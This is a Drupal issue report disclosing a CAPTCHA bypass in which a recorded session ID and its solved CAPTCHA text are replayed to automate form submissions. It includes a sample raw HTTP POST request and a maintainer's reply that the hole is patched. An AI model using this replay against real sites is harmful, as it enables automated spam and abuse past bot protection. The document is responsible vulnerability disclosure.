Most CAPTCHAs don't destroy the session when the correct phrase is entered. So by reusing the session id of a known CAPTCHA image, it is possible to automate requests to a CAPTCHA-protected page.

I have tested a number of free and commercial CAPTCHA scripts, and most of them are vulnerable to this method of exploitation. This includes the popular humanVerify solution, and many others.

manual steps:
connect to captcha page
record session ID and captcha plaintext

automated steps:
resend session ID and CAPTCHA plaintext any number of times, changing the user data, eg:
POST /vuln_script.php HTTP/1.0
Cookie: PHPSESSID=329847239847238947;
^^^ this is the session id of the page you looked at manually
Content-Length: 49
Connection: close;

name=bob&email=bob@fish.com&captcha=the_plaintext
^^^ this includes the captcha string for the page you looked at manually

The Drupal Captcha is vunerable
tested in July 7th, 2005

------------------------------------------
Reference: http://www.puremango.co.uk/cm_breaking_captcha_115.php

Comments

arnabdotorg’s picture

arnabdotorg CreditAttribution: arnabdotorg commented
Status: Active » Fixed

Thanks for the heads up; patched and fixed for cvs, 4.6 and 4.5

-Arnab

Anonymous’s picture

(not verified) CreditAttribution: commented
Anonymous’s picture

(not verified) CreditAttribution: commented
Anonymous’s picture

(not verified) CreditAttribution: commented
Anonymous’s picture

(not verified) CreditAttribution: commented
Anonymous’s picture

(not verified) CreditAttribution: commented
Anonymous’s picture

(not verified) CreditAttribution: commented
Status: Fixed » Closed (fixed)